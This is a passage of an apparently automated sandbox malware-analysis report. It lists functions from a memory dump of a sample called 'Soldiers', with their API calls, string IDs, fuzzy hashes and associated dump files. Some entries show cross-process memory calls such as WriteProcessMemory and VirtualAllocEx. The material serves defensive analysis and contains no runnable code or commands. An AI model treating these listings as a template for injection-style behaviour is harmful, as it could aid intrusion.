                                                          • Opcode Fuzzy Hash: f6f696516f14d3e202ea27be22a8d3481bc8f97c05988c2178dc47856a618fbe
                                                          • Instruction Fuzzy Hash: 979179711086559FCB24EF28D899D7EB7A8FF96300F00491DF586D72A5EA30EE44CB92
                                                          Function 0094BF7E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00900284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F2A58,?,00008000), ref: 009002A4
                                                          • CoInitialize.OLE32(00000000), ref: 0094BFFE
                                                          • CoCreateInstance.OLE32(00973D3C,00000000,00000001,00973BAC,?), ref: 0094C017
                                                          • CoUninitialize.OLE32 ref: 0094C034
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: 542228bfd2a9d20599ceb3d1aba5a8234f52499e935d449c3157fc5a04f9aeeb
                                                          • Instruction ID: 1a90a49e4cd7d5d4bc8c8e078b6417982a1f1f58ae24b31d6591d9c2ea9db5b1
                                                          • Opcode Fuzzy Hash: 542228bfd2a9d20599ceb3d1aba5a8234f52499e935d449c3157fc5a04f9aeeb
                                                          • Instruction Fuzzy Hash: D0A16A756043459FCB00DF29C884E6AB7E5FF89314F148998F8999B3A2CB31ED45CB92
                                                          Function 0090523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 009052CD
                                                            • Part of subcall function 00910320: __87except.LIBCMT ref: 0091035B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: 372f0fe860cd79dff94207669e230145935f2d0e3847ed52f7c20581d66dbda8
                                                          • Instruction ID: d830431bff0833bebd98e7c4093fa9b23dbd0691dbd14256e315faab3a4e782c
                                                          • Opcode Fuzzy Hash: 372f0fe860cd79dff94207669e230145935f2d0e3847ed52f7c20581d66dbda8
                                                          • Instruction Fuzzy Hash: 3F517B61B1D609CBCB117718C9813AB7B989FC0750F344D18E0E6861F5FEBA8CC4AE86
                                                          Function 00900654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$+
                                                          • API String ID: 0-2552117581
                                                          • Opcode ID: bb2f91be55d07bfc2061aa8edc8dae99648eb0f0dcc85c8d810d66cb84fb63a8
                                                          • Instruction ID: 1d12568a009fa197ba8df08a4e3aa56776baf8e8dd42172459cf950f2fb76bdd
                                                          • Opcode Fuzzy Hash: bb2f91be55d07bfc2061aa8edc8dae99648eb0f0dcc85c8d810d66cb84fb63a8
                                                          • Instruction Fuzzy Hash: 11511175504245EFDF15DF28C844AFA7BA8FF99310F148055E8929B2D0D738AD82CF61
                                                          Function 008FCF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: ERCP
                                                          • API String ID: 2532777613-1384759551
                                                          • Opcode ID: 05f40566daef9f578b42782e94b97e746aafebe83def3a3ed16a02588b28ea59
                                                          • Instruction ID: 33aeaeef0dad136112ac2dfd7e7fccdec8c89266a5c8897fcc491a47b9645986
                                                          • Opcode Fuzzy Hash: 05f40566daef9f578b42782e94b97e746aafebe83def3a3ed16a02588b28ea59
                                                          • Instruction Fuzzy Hash: 3851B3B1900B0D9FDB24CF65C8817AABBF9FF44314F24856EE64ADB250EB709685CB40
                                                          Function 0093A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00941CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00939E4E,?,?,00000034,00000800,?,00000034), ref: 00941CE5
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000,?,00000000,00000010,00000010,?,00000000), ref: 0093A3F7
                                                            • Part of subcall function 00941C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00939E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00941CB0
                                                            • Part of subcall function 00941BDD: GetWindowThreadProcessId.USER32(?,?,00000000,00000000,?,?,00939E12,00000034,?,?,00001004,00000000,00000000), ref: 00941C08
                                                            • Part of subcall function 00941BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00939E12,00000034,?,?,00001004,00000000,00000000), ref: 00941C18
                                                            • Part of subcall function 00941BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00939E12,00000034,?,?,00001004,00000000,00000000), ref: 00941C2E
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000010,?,00000000,?,00000010,?,00001104,00000000,00000000), ref: 0093A464
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000000,?,00000010,?,00000000,?,00000010,?,00001104), ref: 0093A4B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: 8b87b41920e4d4bcd3941ca18c6f8909ffe4a549461f86bd053bcba8b8100584
                                                          • Instruction ID: 700e84267ddacd480b435e948fe47f44b8a29ed43cf26943c02481376c94cafc
                                                          • Opcode Fuzzy Hash: 8b87b41920e4d4bcd3941ca18c6f8909ffe4a549461f86bd053bcba8b8100584
                                                          • Instruction Fuzzy Hash: 7B413B7290021CAFDB10DBA4CD86FEEBBB8EF45700F004195FA95B7191DA716E85CBA1
                                                          Function 00967F6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00970980,00000000,?,?,?,?), ref: 00968004
                                                          • GetWindowLongW.USER32 ref: 00968021
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00968031
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 20c617f7d8bb343e45e5d8fe3f4a83ffa0460f0e25401b6446636eb450651075
                                                          • Instruction ID: e6acbc056569994685e142e14882d5aa7b4e9cdede69fa04f6f3bafac3dd278c
                                                          • Opcode Fuzzy Hash: 20c617f7d8bb343e45e5d8fe3f4a83ffa0460f0e25401b6446636eb450651075
                                                          • Instruction Fuzzy Hash: 1A31AE31214205ABDB218E78CC45BEBB7A9FB85324F244725F975D32E0DB31A8919B60
                                                          Function 009679FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?,?,?,SysMonthCal32,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00967A86
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00967A9A
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00967ABE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: fee004ce62a80b2e9ca786d2e445536a851b7fc63c0b06badcf49f2be250074f
                                                          • Instruction ID: 84823a40bc55f6ea5424fc2374705f547f49ec9537f71e367233b2b0ebe7c996
                                                          • Opcode Fuzzy Hash: fee004ce62a80b2e9ca786d2e445536a851b7fc63c0b06badcf49f2be250074f
                                                          • Instruction Fuzzy Hash: AA21A332614218BFDF118F94CC46FEE7B69EF88714F110214FE156B1D0D6B5A9909BA0
                                                          Function 009681B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0096826F
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0096827D
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00968284
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: 55350bb702da8583bd33d5b85238498e068c5e47aa87f20de795f07c5f4c0f6f
                                                          • Instruction ID: f62432343cf13c3d06a13473d295f6a99406e5bf69e4727bbd255c74bf209acc
                                                          • Opcode Fuzzy Hash: 55350bb702da8583bd33d5b85238498e068c5e47aa87f20de795f07c5f4c0f6f
                                                          • Instruction Fuzzy Hash: 3221B0B1604208AFDB00DF58CCD5DA777EDEF8A794B040259FA119B291CB70EC51DBA0
                                                          Function 009672D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?,?,?,Listbox,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00967360
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00967370
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00967395
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 979be510b73eefc353bdde3e55fc1661ef075ff9c481dab30a58470919e4369d
                                                          • Instruction ID: 42b1087470ae770c55ba52bac2e52d4b4b9d3caedf5d01135b46af9f4e4e3a65
                                                          • Opcode Fuzzy Hash: 979be510b73eefc353bdde3e55fc1661ef075ff9c481dab30a58470919e4369d
                                                          • Instruction Fuzzy Hash: 9B21CF32614118BFDF128F94DC85EBF77AEEF89768F118124F9049B290D671AC51ABA0
                                                          Function 00967D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000,?,?,msctls_trackbar32,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00967D97
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00967DAC
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00967DB9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: 121ceda47a6f4a6e4e7b5d1656e1cd174325bf24be23037031b522fd49a2d77a
                                                          • Instruction ID: 5877072def815004b8314d20cc0d19467d33cca7ea94bbaf6cc6c17e2416a2c9
                                                          • Opcode Fuzzy Hash: 121ceda47a6f4a6e4e7b5d1656e1cd174325bf24be23037031b522fd49a2d77a
                                                          • Instruction Fuzzy Hash: 0F11E372244208BADF209FA4CC56FEB77ADEFC9B18F114518FA41A60D0D671A851DB20
                                                          Function 008E1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008E1275,SwapMouseButtons,00000004,?), ref: 008E12A8
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008E1275,SwapMouseButtons,00000004,?), ref: 008E12C9
                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,80000001,80000001,?,008E1275,SwapMouseButtons,00000004,?), ref: 008E12EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 7bc7e58c9f82237e2f6c5a0b56f65654b22d8d2e9dcfee241b8202f64e305598
                                                          • Instruction ID: ce9140ea99b3c6dad7d18a547adb23b5a4760d38d83fc82cbf09bd96620bc7ea
                                                          • Opcode Fuzzy Hash: 7bc7e58c9f82237e2f6c5a0b56f65654b22d8d2e9dcfee241b8202f64e305598
                                                          • Instruction Fuzzy Hash: 00114871624248FFDF20CFA5DC88AAEBBA8FF46750F004559E909E7210D2319E40A7A0
                                                          Function 0095C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0092027A,?), ref: 0095C6E7
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0095C6F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: 947009d302c6861a9a0750e34c6511cf69e46d4948d42fb610ab364239ee4384
                                                          • Instruction ID: b73a21fd9c3748c01eaaa5c4ef802dff628368663aa6ceff909e7f0b600b193e
                                                          • Opcode Fuzzy Hash: 947009d302c6861a9a0750e34c6511cf69e46d4948d42fb610ab364239ee4384
                                                          • Instruction Fuzzy Hash: 8DE0CDB9124302CFDB309B26CC45A4576D8FF58355B80841DDC89D2610D770D880CF10
                                                          Function 008F4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,008F4AF7,?), ref: 008F4BB8
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008F4BCA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: 6a7b82ecd299d14663448276f6cd177d6477c4ffd7a65647b99832e861a83bef
                                                          • Instruction ID: d7de88702fcf2fd6e9a53be9ef2b85b618e6c1283b45cac14ee4e88c7e791acd
                                                          • Opcode Fuzzy Hash: 6a7b82ecd299d14663448276f6cd177d6477c4ffd7a65647b99832e861a83bef
                                                          • Instruction Fuzzy Hash: 73D0C772428312CFD7208FB0DC08B0BB2E4BF80360B00EC2AD48AD2651EA70C8C0CB00
                                                          Function 008F4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,008F4B44,?,008F49D4,?,?,008F27AF,?,00000001), ref: 008F4B85
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008F4B97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: 8e193daace4299365c4c76aa259627a4f4dba3e0f986917a7583d86017672ecc
                                                          • Instruction ID: 8e3a70e7f7b28c5e9793034854e4897af5da7f62a2251d510cd022a00a2c5f37
                                                          • Opcode Fuzzy Hash: 8e193daace4299365c4c76aa259627a4f4dba3e0f986917a7583d86017672ecc
                                                          • Instruction Fuzzy Hash: 2FD01272528713CFD7205F75DC1971A76D4BF84355F51D82AD989E2550D7B0D4C0DA10
                                                          Function 00961447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00961696), ref: 00961455
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00961467
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
